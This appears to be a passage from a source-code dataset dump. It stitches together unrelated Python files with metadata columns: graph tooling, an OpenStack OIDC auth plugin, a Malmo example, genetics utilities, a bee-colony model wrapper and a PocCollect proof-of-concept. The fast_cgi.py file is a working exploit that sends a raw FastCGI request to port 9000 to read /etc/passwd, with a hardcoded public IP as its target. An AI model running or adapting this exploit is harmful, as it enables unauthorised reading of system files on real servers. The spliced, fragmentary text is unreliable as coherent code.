og.set_edge_attribute(element_id, dst_name, dst_type, target)
def run(self, args):
if len(args) < 6 and args[3] == 'to':
self.console.log("Usage: {0} <src type> <src attribute> to <dst type> <dst attribute> [options]".format(args[0]))
return
if 'nodes' in self.console.query:
for nid in self.console.query['nodes']:
self.lambda_map("node", nid, args[1], args[2], args[4], args[5], args[6:])
if 'edges' in self.console.query:
for eid in self.console.query['edges']:
self.lambda_map("edge", eid, args[1], args[2], args[4], args[5], args[6:]) | bsd-2-clause | -4,776,052,747,866,240,000 | 32.471264 | 116 | 0.638502 | false |
nanshihui/PocCollect | component/fast_cgi/fast_cgi.py | 1 | 2068 | #!/usr/bin/env python
# encoding: utf-8
from t import T
import socket
class P(T):
def __init__(self):
T.__init__(self)
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
timeout=3
result = {}
result['result']=False
target_url='http://'+ip+':'+port
socket.setdefaulttimeout(timeout)
client_socket=None
# 测试是否有leak
try:
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ip, 9000))
data = """
01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00
01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53
54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52
56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50
2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52
4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44
52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49
50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f
70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53
4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69
63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00
"""
data_s = ''
for _ in data.split():
data_s += chr(int(_, 16))
client_socket.send(data_s)
ret = client_socket.recv(1024)
if ret.find(':root:') > 0:
result['result']=True
result['VerifyInfo'] = {}
result['VerifyInfo']['type']='fast-cgi Vulnerability'
result['VerifyInfo']['URL'] =target_url
result['VerifyInfo']['payload']=data_s
result['VerifyInfo']['result'] =ret
except:
pass
finally:
if client_socket is not None:
client_socket.close()
return result
if __name__ == '__main__':
print P().verify(ip='58.220.22.101',port='80') | mit | 5,356,842,197,419,762,000 | 28.414286 | 93 | 0.499514 | false |
klmitch/python-keystoneclient | keystoneclient/contrib/auth/v3/oidc.py | 1 | 8795 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from positional import positional
from keystoneclient import access
from keystoneclient.auth.identity.v3 import federated
class OidcPassword(federated.FederatedBaseAuth):
"""Implement authentication plugin for OpenID Connect protocol.
OIDC or OpenID Connect is a protocol for federated authentication.
The OpenID Connect specification can be found at::
``http://openid.net/specs/openid-connect-core-1_0.html``
"""
@classmethod
def get_options(cls):
options = super(OidcPassword, cls).get_options()
options.extend([
cfg.StrOpt('username', help='Username'),
cfg.StrOpt('password', secret=True, help='Password'),
cfg.StrOpt('client-id', help='OAuth 2.0 Client ID'),
cfg.StrOpt('client-secret', secret=True,
help='OAuth 2.0 Client Secret'),
cfg.StrOpt('access-token-endpoint',
help='OpenID Connect Provider Token Endpoint'),
cfg.StrOpt('scope', default="profile",
help='OpenID Connect scope that is requested from OP')
])
return options
@positional(4)
def __init__(self, auth_url, identity_provider, protocol,
username, password, client_id, client_secret,
access_token_endpoint, scope='profile',
grant_type='password'):
"""The OpenID Connect plugin expects the following:
:param auth_url: URL of the Identity Service
:type auth_url: string
:param identity_provider: Name of the Identity Provider the client
will authenticate against
:type identity_provider: string
:param protocol: Protocol name as configured in keystone
:type protocol: string
:param username: Username used to authenticate
:type username: string
:param password: Password used to authenticate
:type password: string
:param client_id: OAuth 2.0 Client ID
:type client_id: string
:param client_secret: OAuth 2.0 Client Secret
:type client_secret: string
:param access_token_endpoint: OpenID Connect Provider Token Endpoint,
for example:
https://localhost:8020/oidc/OP/token
:type access_token_endpoint: string
:param scope: OpenID Connect scope that is requested from OP,
defaults to "profile", for example: "profile email"
:type scope: string
:param grant_type: OpenID Connect grant type, it represents the flow
that is used to talk to the OP. Valid values are:
"authorization_code", "refresh_token", or
"password".
:type grant_type: string
"""
super(OidcPassword, self).__init__(auth_url, identity_provider,
protocol)
self._username = username
self._password = password
self.client_id = client_id
self.client_secret = client_secret
self.access_token_endpoint = access_token_endpoint
self.scope = scope
self.grant_type = grant_type
@property
def username(self):
# Override to remove deprecation.
return self._username
@username.setter
def username(self, value):
# Override to remove deprecation.
self._username = value
@property
def password(self):
# Override to remove deprecation.
return self._password
@password.setter
def password(self, value):
# Override to remove deprecation.
self._password = value
def get_unscoped_auth_ref(self, session):
"""Authenticate with OpenID Connect and get back claims.
This is a multi-step process. First an access token must be retrieved,
to do this, the username and password, the OpenID Connect client ID
and secret, and the access token endpoint must be known.
Secondly, we then exchange the access token upon accessing the
protected Keystone endpoint (federated auth URL). This will trigger
the OpenID Connect Provider to perform a user introspection and
retrieve information (specified in the scope) about the user in
the form of an OpenID Connect Claim. These claims will be sent
to Keystone in the form of environment variables.
:param session: a session object to send out HTTP requests.
:type session: keystoneclient.session.Session
:returns: a token data representation
:rtype: :py:class:`keystoneclient.access.AccessInfo`
"""
# get an access token
client_auth = (self.client_id, self.client_secret)
payload = {'grant_type': self.grant_type, 'username': self.username,
'password': self.password, 'scope': self.scope}
response = self._get_access_token(session, client_auth, payload,
self.access_token_endpoint)
access_token = response.json()['access_token']
# use access token against protected URL
headers = {'Authorization': 'Bearer ' + access_token}
response = self._get_keystone_token(session, headers,
self.federated_token_url)
# grab the unscoped token
token = response.headers['X-Subject-Token']
token_json = response.json()['token']
return access.AccessInfoV3(token, **token_json)
def _get_access_token(self, session, client_auth, payload,
access_token_endpoint):
"""Exchange a variety of user supplied values for an access token.
:param session: a session object to send out HTTP requests.
:type session: keystoneclient.session.Session
:param client_auth: a tuple representing client id and secret
:type client_auth: tuple
:param payload: a dict containing various OpenID Connect values, for
example::
{'grant_type': 'password', 'username': self.username,
'password': self.password, 'scope': self.scope}
:type payload: dict
:param access_token_endpoint: URL to use to get an access token, for
example: https://localhost/oidc/token
:type access_token_endpoint: string
"""
op_response = session.post(self.access_token_endpoint,
requests_auth=client_auth,
data=payload,
authenticated=False)
return op_response
def _get_keystone_token(self, session, headers, federated_token_url):
"""Exchange an acess token for a keystone token.
By Sending the access token in an `Authorization: Bearer` header, to
an OpenID Connect protected endpoint (Federated Token URL). The
OpenID Connect server will use the access token to look up information
about the authenticated user (this technique is called instrospection).
The output of the instrospection will be an OpenID Connect Claim, that
will be used against the mapping engine. Should the mapping engine
succeed, a Keystone token will be presented to the user.
:param session: a session object to send out HTTP requests.
:type session: keystoneclient.session.Session
:param headers: an Authorization header containing the access token.
:type headers_: dict
:param federated_auth_url: Protected URL for federated authentication,
for example: https://localhost:5000/v3/\
OS-FEDERATION/identity_providers/bluepages/\
protocols/oidc/auth
:type federated_auth_url: string
"""
auth_response = session.post(self.federated_token_url,
headers=headers,
authenticated=False)
return auth_response
| apache-2.0 | -3,890,712,068,428,765 | 40.880952 | 79 | 0.61444 | false |
Yarichi/Proyecto-DASI | Malmo/Python_Examples/mission_quit_command_example.py | 1 | 4421 | # ------------------------------------------------------------------------------------------------
# Copyright (c) 2016 Microsoft Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ------------------------------------------------------------------------------------------------
# Quit command example
import MalmoPython
import os
import sys
import time
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0) # flush print output immediately
missionXML='''<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<Mission xmlns="http://ProjectMalmo.microsoft.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<About>
<Summary>If at first you don't succeed, give up.</Summary>
</About>
<ServerSection>
<ServerHandlers>
<FlatWorldGenerator generatorString="3;7,220*1,5*3,2;3;,biome_1"/>
<ServerQuitFromTimeUp timeLimitMs="30000"/>
<ServerQuitWhenAnyAgentFinishes/>
</ServerHandlers>
</ServerSection>
<AgentSection mode="Survival">
<Name>QuitBot</Name>
<AgentStart/>
<AgentHandlers>
<ObservationFromFullStats/>
<ContinuousMovementCommands turnSpeedDegs="180"/>
<ChatCommands />
<MissionQuitCommands quitDescription="give_up"/>
<RewardForMissionEnd>
<Reward description="give_up" reward="-1000"/>
</RewardForMissionEnd>
</AgentHandlers>
</AgentSection>
</Mission>'''
# Create default Malmo objects:
agent_host = MalmoPython.AgentHost()
try:
agent_host.parse( sys.argv )
except RuntimeError as e:
print 'ERROR:',e
print agent_host.getUsage()
exit(1)
if agent_host.receivedArgument("help"):
print agent_host.getUsage()
exit(0)
my_mission = MalmoPython.MissionSpec(missionXML, True)
my_mission_record = MalmoPython.MissionRecordSpec()
# Attempt to start a mission:
max_retries = 3
for retry in range(max_retries):
try:
agent_host.startMission( my_mission, my_mission_record )
break
except RuntimeError as e:
if retry == max_retries - 1:
print "Error starting mission:",e
exit(1)
else:
time.sleep(2)
# Loop until mission starts:
print "Waiting for the mission to start ",
world_state = agent_host.getWorldState()
while not world_state.has_mission_begun:
sys.stdout.write(".")
time.sleep(0.1)
world_state = agent_host.getWorldState()
for error in world_state.errors:
print "Error:",error.text
print
print "Mission running ",
count = 0
# Loop until mission ends:
while world_state.is_mission_running:
sys.stdout.write(".")
time.sleep(0.5)
if count == 10:
print
print "Giving up!"
agent_host.sendCommand("quit")
count += 1
world_state = agent_host.getWorldState()
for error in world_state.errors:
print "Error:",error.text
for reward in world_state.rewards:
print "Reward:",reward.getValue()
print
print "Mission ended"
# Mission has ended.
| gpl-2.0 | -3,410,355,032,639,231,500 | 35.151261 | 117 | 0.598055 | false |
ema/conpaas | conpaas-services/src/conpaas/services/htc/manager/configuration.py | 1 | 4786 | '''
Created on Jul 23, 2013
@author: Vlad
'''
import random
class Configuration:
def __init__(self,types_list, cost_list, limit_list):
self.keys = dict(zip(types_list, range(len(types_list))))
self.averages = {} # dictionary of averages with k as a machine type
self.rav = {} # dictionary of averages with k as a machine type
self.notasks = {} # dictionary of averages with k as a machine type
self.throughput = {} # dictionary of tasks with relevant time unit as k
self.conf = {}
self.costs = dict(zip(types_list,cost_list))
self.limits = dict(zip(types_list,limit_list))
self.ratios={}
for k in self.keys:
self.costs[self.keys[k]]=self.costs[k]
del self.costs[k]
self.limits[self.keys[k]]=self.limits[k]
del self.limits[k]
self.notasks[self.keys[k]] = 0
self.averages[self.keys[k]] = 0
self.rav[self.keys[k]] = 0
self.conf[self.keys[k]]= 0
random.seed()
self.conf_dict = {}
self.m = {}
def relevant_time_unit(self):
rk = random.choice(self.averages.keys())
t=60
self.throughput[rk] = round(t / self.averages[rk])
self.unit = t
for k in self.costs:
self.costs[k] *= float(self.unit)/3600
self.compute_throughput()
return self.unit
def compute_throughput(self):
for k in self.averages:
self.throughput[k] = round(self.unit / self.rav[k])
def set_average(self,m_type,value, count):
if self.keys[m_type] in self.averages.keys():
self.averages[self.keys[m_type]]=value
self.notasks[self.keys[m_type]] +=count
if m_type=='small':
self.rav[self.keys[m_type]]= value
if m_type=='medium':
self.rav[self.keys[m_type]]= value/4
if m_type=='large':
self.rav[self.keys[m_type]] = value/8
def compute_ratios(self):
for k in self.costs:
self.ratios[k] = round(self.costs[k]/self.throughput[k], 5 )
def compute_tmax(self):
tmax = 0
for k in self.throughput:
tmax += self.limits[k]*self.throughput[k]
return tmax
def cost_conf(self):
c = 0
for k in self.costs:
c += self.conf[k]*self.costs[k]
return c
def cheap_check(self,start,target):
cheap_list = self.costs.values()
sorted_list = sorted(self.costs.values())
cheap = 0
for p in sorted_list:
kp = cheap_list.index(p)
if start + self.throughput[kp] > target and kp in self.ratios.keys() :
self.conf[kp]+=1
cheap=1
break
return cheap
def compute_configuration(self, target):
for k in self.averages:
self.conf[k]= 0
self.compute_ratios()
start = 0
while start < target and len(self.ratios)>0:
if self.cheap_check(start, target) ==1:
return self.conf
r = self.ratios.values()
m = min(r)
for km in self.ratios:
if self.ratios[km] == m:
break
while self.limits[km] > self.conf[km]:
start+=self.throughput[km]
self.conf[km]+=1
if start >= target:
return self.conf
if self.cheap_check(start, target) == 1:
return self.conf
del self.ratios[km]
return self.conf
def dynamic_configuration(self):
tmax = self.compute_tmax()
for k in self.limits:
self.conf[k]=self.limits[k]
t = tmax - 1
self.conf_dict = {}
self.conf_dict[tmax] = self.conf
self.m = {}
self.m[tmax] = self.cost_conf()
while t >= 0:
self.m[t]=self.m[t+1]
km = -1
for k in self.throughput:
if tmax - self.throughput[k] >= t:
if self.m[t] > self.m[t+self.throughput[k]] - self.costs[k] and self.conf_dict[t+self.throughput[k]][k]>0:
self.m[t] = self.m[t+self.throughput[k]] - self.costs[k]
km = k
if km > -1:
self.conf_dict[t] = self.conf_dict[t+self.throughput[km]].copy()
self.conf_dict[t][km] -= 1
else:
self.conf_dict[t] = self.conf_dict[t+1].copy()
t-=1
self.m[0]=0
return self.m
| bsd-3-clause | -8,171,769,272,402,431,000 | 32.236111 | 126 | 0.494985 | false |
omerwe/LEAP | leapUtils.py | 1 | 10998 | import numpy as np
from optparse import OptionParser
import scipy.linalg as la
import scipy.stats as stats
import scipy.linalg.blas as blas
import pandas as pd
import csv
import time
import fastlmm.util.VertexCut as vc
from pysnptools.snpreader.bed import Bed
import pysnptools.util as pstutil
import pysnptools.util.pheno as phenoUtils
np.set_printoptions(precision=3, linewidth=200)
def loadData(bfile, extractSim, phenoFile, missingPhenotype='-9', loadSNPs=False, standardize=True):
bed = Bed(bfile, count_A1=True)
if (extractSim is not None):
f = open(extractSim)
csvReader = csv.reader(f)
extractSnpsSet = set([])
for l in csvReader: extractSnpsSet.add(l[0])
f.close()
keepSnpsInds = [i for i in range(bed.sid.shape[0]) if bed.sid[i] in extractSnpsSet]
bed = bed[:, keepSnpsInds]
phe = None
if (phenoFile is not None): bed, phe = loadPheno(bed, phenoFile, missingPhenotype)
if (loadSNPs):
bed = bed.read()
if (standardize): bed = bed.standardize()
return bed, phe
def loadPheno(bed, phenoFile, missingPhenotype='-9', keepDict=False):
pheno = phenoUtils.loadOnePhen(phenoFile, missing=missingPhenotype, vectorize=True)
checkIntersection(bed, pheno, 'phenotypes')
bed, pheno = pstutil.intersect_apply([bed, pheno])
if (not keepDict): pheno = pheno['vals']
return bed, pheno
def checkIntersection(bed, fileDict, fileStr, checkSuperSet=False):
bedSet = set((b[0], b[1]) for b in bed.iid)
fileSet = set((b[0], b[1]) for b in fileDict['iid'])
if checkSuperSet:
if (not fileSet.issuperset(bedSet)): raise Exception(fileStr + " file does not include all individuals in the bfile")
intersectSet = bedSet.intersection(fileSet)
if (len(intersectSet) != len (bedSet)):
print(len(intersectSet), 'individuals appear in both the plink file and the', fileStr, 'file')
def symmetrize(a):
return a + a.T - np.diag(a.diagonal())
def loadRelatedFile(bed, relFile):
relatedDict = phenoUtils.loadOnePhen(relFile, vectorize=True)
checkIntersection(bed, relatedDict, 'relatedness', checkSuperSet=True)
_, relatedDict = pstutil.intersect_apply([bed, relatedDict])
related = relatedDict['vals']
keepArr = (related < 0.5)
print(np.sum(~keepArr), 'individuals will be removed due to high relatedness')
return keepArr
def findRelated(bed, cutoff, kinshipFile=None):
if (kinshipFile is None):
print('Computing kinship matrix...')
t0 = time.time()
XXT = symmetrize(blas.dsyrk(1.0, bed.val, lower=1) / bed.val.shape[1])
print('Done in %0.2f'%(time.time()-t0), 'seconds')
else:
XXT = np.loadtxt(kinshipFile)
#Find related individuals
removeSet = set(np.sort(vc.VertexCut().work(XXT, cutoff))) #These are the indexes of the IIDs to remove
print('Marking', len(removeSet), 'individuals to be removed due to high relatedness')
#keepArr = np.array([(1 if iid in keepSet else 0) for iid in bed.iid], dtype=bool)
keepArr = np.ones(bed.iid.shape[0], dtype=bool)
for i in removeSet: keepArr[i] = False
return keepArr
def eigenDecompose(XXT, ignore_neig=False):
t0 = time.time()
print('Computing eigendecomposition...')
s,U = la.eigh(XXT)
if (not ignore_neig and (np.min(s) < -1e-4)): raise Exception('Negative eigenvalues found')
s[s<0]=0
ind = np.argsort(s)
ind = ind[s>1e-12]
U = U[:, ind]
s = s[ind]
print('Done in %0.2f'%(time.time()-t0), 'seconds')
return s,U
def loadCovars(bed, covarFile):
covarsDict = phenoUtils.loadPhen(covarFile)
checkIntersection(bed, covarsDict, 'covariates', checkSuperSet=True)
_, covarsDict = pstutil.intersect_apply([bed, covarsDict])
covar = covarsDict['vals']
return covar
def getSNPCovarsMatrix(bed, resfile, pthresh, mindist):
snpNameToNumDict = dict([])
for i,s in enumerate(bed.sid): snpNameToNumDict[s] = i
f = open(resfile)
csvReader = csv.reader(f, delimiter="\t")
next(csvReader)
significantSNPs = []
significantSNPNames = []
lastPval = 0
featuresPosList = []
for l in csvReader:
snpName, pVal = l[0], float(l[4])
if (pVal < lastPval): raise Exception('P-values are not sorted in descending order: ' + str(pVal) + ">" + str(lastPval))
lastPval = pVal
if (pVal > pthresh): break
if (snpName not in snpNameToNumDict): continue
significantSNPNames.append(snpName)
if (mindist == 0):
significantSNPs.append(snpNameToNumDict[snpName])
print('Using SNP', snpName, 'with p<%0.2e'%pVal, 'as a fixed effect')
else:
posArr = bed.pos[snpNameToNumDict[snpName]]
chrom, pos = posArr[0], int(posArr[2])
addSNP = True
for (c,p) in featuresPosList:
if (chrom == c and abs(pos-p) < mindist):
addSNP = False
break
if addSNP:
significantSNPs.append(snpNameToNumDict[snpName])
featuresPosList.append((chrom, pos))
print('Using SNP', snpName, '('+str(int(chrom))+':'+str(pos)+') with p<%0.2e'%pVal, 'as a fixed effect')
f.close()
snpCovarsMat = bed.val[:, significantSNPs]
return snpCovarsMat
def getExcludedChromosome(bfile, chrom):
bed = Bed(bfile, count_A1=True)
indsToKeep = (bed.pos[:,0] != chrom)
bed = bed[:, indsToKeep]
return bed.read().standardize()
def getChromosome(bfile, chrom):
bed = Bed(bfile, count_A1=True)
indsToKeep = (bed.pos[:,0] == chrom)
bed = bed[:, indsToKeep]
return bed.read().standardize()
def _fixupBedAndPheno(bed, pheno, missingPhenotype='-9'):
bed = _fixupBed(bed)
bed, pheno = _fixup_pheno(pheno, bed, missingPhenotype)
return bed, pheno
def _fixupBed(bed):
if isinstance(bed, str):
return Bed(bed, count_A1=True).read().standardize()
else: return bed
def _fixup_pheno(pheno, bed=None, missingPhenotype='-9'):
if (isinstance(pheno, str)):
if (bed is not None):
bed, pheno = loadPheno(bed, pheno, missingPhenotype, keepDict=True)
return bed, pheno
else:
phenoDict = phenoUtils.loadOnePhen(pheno, missing=missingPhenotype, vectorize=True)
return phenoDict
else:
if (bed is not None): return bed, pheno
else: return pheno
def linreg(bed, pheno):
#Extract snps and phenotype
bed, pheno = _fixupBedAndPheno(bed, pheno)
if isinstance(pheno, dict): phe = pheno['vals']
else: phe = pheno
if (len(phe.shape)==2):
if (phe.shape[1]==1): phe=phe[:,0]
else: raise Exception('More than one phenotype found')
#Normalize y. We assume X is already normalized.
y = phe - phe.mean(); y /= y.std()
#Compute p-values
Xy = bed.val.T.dot(y) / y.shape[0]
Xy[Xy>1.0] = 1.0
Xy[Xy<-1.0] = -1.0
df = y.shape[0]-2
TINY = 1.0e-20
t = Xy * np.sqrt(df / ((1.0-Xy+TINY) * (1.0+Xy+TINY)))
pValT = stats.t.sf(np.abs(t), df)*2
#Create pandas data frame
items = [
('SNP', bed.sid),
('Chr', bed.pos[:,0]),
('GenDist', bed.pos[:,1]),
('ChrPos', bed.pos[:,2]),
('PValue', pValT),
]
frame = pd.DataFrame.from_items(items)
frame.sort("PValue", inplace=True)
frame.index = np.arange(len(frame))
return frame
def powerPlot(df, causalSNPs, title=''):
import pylab
causalSNPs = set(causalSNPs)
csnpPvals = df[df['SNP'].isin(causalSNPs)]["PValue"]
pvalPoints = np.logspace(-6, -2, num=1000)
power = [np.mean(csnpPvals < p ) for p in list(pvalPoints)]
pylab.plot(-np.log10(pvalPoints), power)
pylab.xlabel("-log10(Significance Threshold)")
pylab.ylabel("Power")
pylab.title(title)
def computeCovar(bed, shrinkMethod, fitIndividuals):
eigen = dict([])
if (shrinkMethod in ['lw', 'oas', 'l1', 'cv']):
import sklearn.covariance as cov
t0 = time.time()
print('Estimating shrunk covariance using', shrinkMethod, 'estimator...')
if (shrinkMethod == 'lw'): covEstimator = cov.LedoitWolf(assume_centered=True, block_size = 5*bed.val.shape[0])
elif (shrinkMethod == 'oas'): covEstimator = cov.OAS(assume_centered=True)
elif (shrinkMethod == 'l1'): covEstimator = cov.GraphLassoCV(assume_centered=True, verbose=True)
elif (shrinkMethod == 'cv'):
shrunkEstimator = cov.ShrunkCovariance(assume_centered=True)
param_grid = {'shrinkage': [0.01, 0.1, 0.3, 0.5, 0.7, 0.9, 0.99]}
covEstimator = sklearn.grid_search.GridSearchCV(shrunkEstimator, param_grid)
else: raise Exception('unknown covariance regularizer')
covEstimator.fit(bed.val[fitIndividuals, :].T)
if (shrinkMethod == 'l1'):
alpha = covEstimator.alpha_
print('l1 alpha chosen:', alpha)
covEstimator2 = cov.GraphLasso(alpha=alpha, assume_centered=True, verbose=True)
else:
if (shrinkMethod == 'cv'): shrinkEstimator = clf.best_params_['shrinkage']
else: shrinkEstimator = covEstimator.shrinkage_
print('shrinkage estimator:', shrinkEstimator)
covEstimator2 = cov.ShrunkCovariance(shrinkage=shrinkEstimator, assume_centered=True)
covEstimator2.fit(bed.val.T)
XXT = covEstimator2.covariance_ * bed.val.shape[1]
print('Done in %0.2f'%(time.time()-t0), 'seconds')
else:
print('Computing kinship matrix...')
t0 = time.time()
XXT = symmetrize(blas.dsyrk(1.0, bed.val, lower=1))
print('Done in %0.2f'%(time.time()-t0), 'seconds')
try: shrinkParam = float(shrinkMethod)
except: shrinkParam = -1
if (shrinkMethod == 'mylw'):
XXT_fit = XXT[np.ix_(fitIndividuals, fitIndividuals)]
sE2R = (np.sum(XXT_fit**2) - np.sum(np.diag(XXT_fit)**2)) / (bed.val.shape[1]**2)
#temp = (bed.val**2).dot((bed.val.T)**2)
temp = symmetrize(blas.dsyrk(1.0, bed.val[fitIndividuals, :]**2, lower=1))
sER2 = (temp.sum() - np.diag(temp).sum()) / bed.val.shape[1]
shrinkParam = (sER2 - sE2R) / (sE2R * (bed.val.shape[1]-1))
if (shrinkParam > 0):
print('shrinkage estimator:', 1-shrinkParam)
XXT = (1-shrinkParam)*XXT + bed.val.shape[1]*shrinkParam*np.eye(XXT.shape[0])
return XXT
def standardize(X, method, optionsDict):
fitIndividuals = np.ones(X.shape[0], dtype=np.bool)
if (method == 'frq'):
empMean = X.mean(axis=0) / 2.0
X[:, empMean>0.5] = 2 - X[:, empMean>0.5]
print('regularizng SNPs according to frq file...')
frqFile = (optionsDict['bfilesim']+'.frq' if (optionsDict['frq'] is None) else optionsDict['frq'])
mafs = np.loadtxt(frqFile, usecols=[1,2]).mean(axis=1)
snpsMean = 2*mafs
snpsStd = np.sqrt(2*mafs*(1-mafs))
elif (method == 'related'):
if (optionsDict['related'] is None): raise Exception('related file not supplied')
print('regularizng SNPs according to non-related individuals...')
relLines = np.loadtxt(optionsDict['related'], usecols=[2])
keepArr = (relLines != 1)
print('Excluding', np.sum(~keepArr), 'from the covariance matrix standardization')
snpsMean = X[keepArr, :].mean(axis=0)
snpsStd = X[keepArr, :].std(axis=0)
fitIndividuals = keepArr
elif (method == 'controls'):
phe = optionsDict['pheno']
pheThreshold = phe.mean()
controls = (phe<pheThreshold)
print('regularizng SNPs according to controls...')
snpsMean = X[controls, :].mean(axis=0)
snpsStd = X[controls, :].std(axis=0)
fitIndividuals = controls
elif (method is None):
snpsMean = X.mean(axis=0)
snpsStd = X.std(axis=0)
else:
raise Exception('unknown SNP standardization option: ' + method)
X -= snpsMean,
X /= snpsStd
return X, fitIndividuals
| apache-2.0 | 3,903,449,392,061,788,700 | 32.530488 | 122 | 0.68367 | false |
puruckertom/ubertool | ubertool/varroapop/varroapop_functions.py | 1 | 11627 | from __future__ import division #brings in Python 3.0 mixed type calculation rules
import logging
import json
import requests
import math
import pandas as pd
import os
rest_url_varroapop = os.environ.get('OPENCPU_REST_SERVER')
#rest_url_varroapop = 'http://localhost'
if not os.environ.get('OPENCPU_REST_SERVER'):
rest_url_varroapop = 'http://172.20.100.18:5656'
class VarroapopFunctions(object):
"""
Function class for Stir.
"""
def __init__(self):
"""Class representing the functions for VarroaPop"""
super(VarroapopFunctions, self).__init__()
def call_varroapop_api(self):
logging.info("=========== formatting Varroapop JSON payload")
input_json = self.format_varroapop_payload()
logging.info("=========== calling Varroapop windows REST API")
called_endpoint = (rest_url_varroapop + '/ocpu/apps/quanted/VarroaPopWrapper/R/RunVarroaPop/json')
logging.info(called_endpoint)
http_headers = {'Content-Type': 'application/json'}
logging.info("JSON payload:")
print(input_json)
return requests.post(called_endpoint, headers=http_headers, data=input_json, timeout=60)
def fill_model_out_attr(self, output_json):
outputs = json.loads(json.loads(output_json)[0])
self.out_date = self.out_date.append(pd.Series(outputs.get('Date')))
self.out_colony_size = self.out_colony_size.append(pd.Series(outputs.get('Colony.Size')))
self.out_adult_drones = self.out_adult_drones.append(pd.Series(outputs.get('Adult.Drones')))
self.out_adult_workers = self.out_adult_workers.append(pd.Series(outputs.get('Adult.Workers')))
self.out_foragers = self.out_foragers.append(pd.Series(outputs.get('Foragers')))
self.out_capped_drone_brood = self.out_capped_drone_brood.append(pd.Series(outputs.get('Capped.Drone.Brood')))
self.out_capped_worker_brood = self.out_capped_worker_brood.append(pd.Series(outputs.get('Capped.Worker.Brood')))
self.out_drone_larvae = self.out_drone_larvae.append(pd.Series(outputs.get('Drone.Larvae')))
self.out_worker_larvae =self.out_worker_larvae.append(pd.Series(outputs.get('Worker.Larvae')))
self.out_drone_eggs = self.out_drone_eggs.append(pd.Series(outputs.get('Drone.Eggs')))
self.out_worker_eggs = self.out_worker_eggs.append(pd.Series(outputs.get('Worker.Eggs')))
self.out_free_mites = self.out_free_mites.append(pd.Series(outputs.get('Free.Mites')))
self.out_drone_brood_mites =self.out_drone_brood_mites.append(pd.Series(outputs.get('Drone.Brood.Mites')))
self.out_worker_brood_mites =self.out_worker_brood_mites.append(pd.Series(outputs.get('Worker.Brood.Mites')))
self.out_drone_mites_per_cell = self.out_drone_mites_per_cell.append(pd.Series(outputs.get('Mites.Drone.Cell')))
self.out_worker_mites_per_cell = self.out_worker_mites_per_cell.append(pd.Series(outputs.get('Mites.Worker.Cell')))
self.out_mites_dying = self.out_mites_dying.append(pd.Series(outputs.get('Mites.Dying')))
self.out_proportion_mites_dying =self.out_proportion_mites_dying.append(pd.Series(outputs.get('Proportion.Mites.Dying')))
self.out_colony_pollen = self.out_colony_pollen.append(pd.Series(outputs.get('Colony.Pollen..g.')))
self.out_chemical_conc_pollen =self.out_chemical_conc_pollen.append(pd.Series(outputs.get('Pollen.Pesticide.Concentration')))
self.out_colony_nectar = self.out_colony_nectar.append(pd.Series(outputs.get('Colony.Nectar')))
self.out_chemical_conc_nectar =self.out_chemical_conc_nectar.append(pd.Series(outputs.get('Nectar.Pesticide.Concentration')))
self.out_dead_drone_larvae = self.out_dead_drone_larvae.append(pd.Series(outputs.get('Dead.Drone.Larvae')))
self.out_dead_worker_larvae =self.out_dead_worker_larvae.append(pd.Series(outputs.get('Dead.Worker.Larvae')))
self.out_dead_drone_adults = self.out_dead_drone_adults.append(pd.Series(outputs.get('Dead.Drone.Adults')))
self.out_dead_worker_adults = self.out_dead_worker_adults.append(pd.Series(outputs.get('Dead.Worker.Adults')))
self.out_dead_foragers = self.out_dead_foragers.append(pd.Series(outputs.get('Dead.Foragers')))
self.out_queen_strength = self.out_queen_strength.append(pd.Series(outputs.get('Queen.Strength')))
self.out_average_temp_c = self.out_average_temp_c.append(pd.Series(outputs.get('Average.Temperature..celsius.')))
self.out_rain_inch = self.out_rain_inch.append(pd.Series(outputs.get('Rain')))
def fill_summary_stats(self):
self.out_mean_colony_size = self.out_mean_colony_size.append(pd.Series(self.out_colony_size.mean()))
self.out_max_colony_size = self.out_max_colony_size.append(pd.Series(self.out_colony_size.max()))
self.out_min_colony_size = self.out_min_colony_size.append(pd.Series(self.out_colony_size.min()))
self.out_total_bee_mortality = self.out_total_bee_mortality.append(pd.Series(sum([self.out_dead_drone_adults.sum(),
self.out_dead_drone_larvae.sum(),
self.out_dead_worker_adults.sum(),
self.out_dead_worker_larvae.sum(),
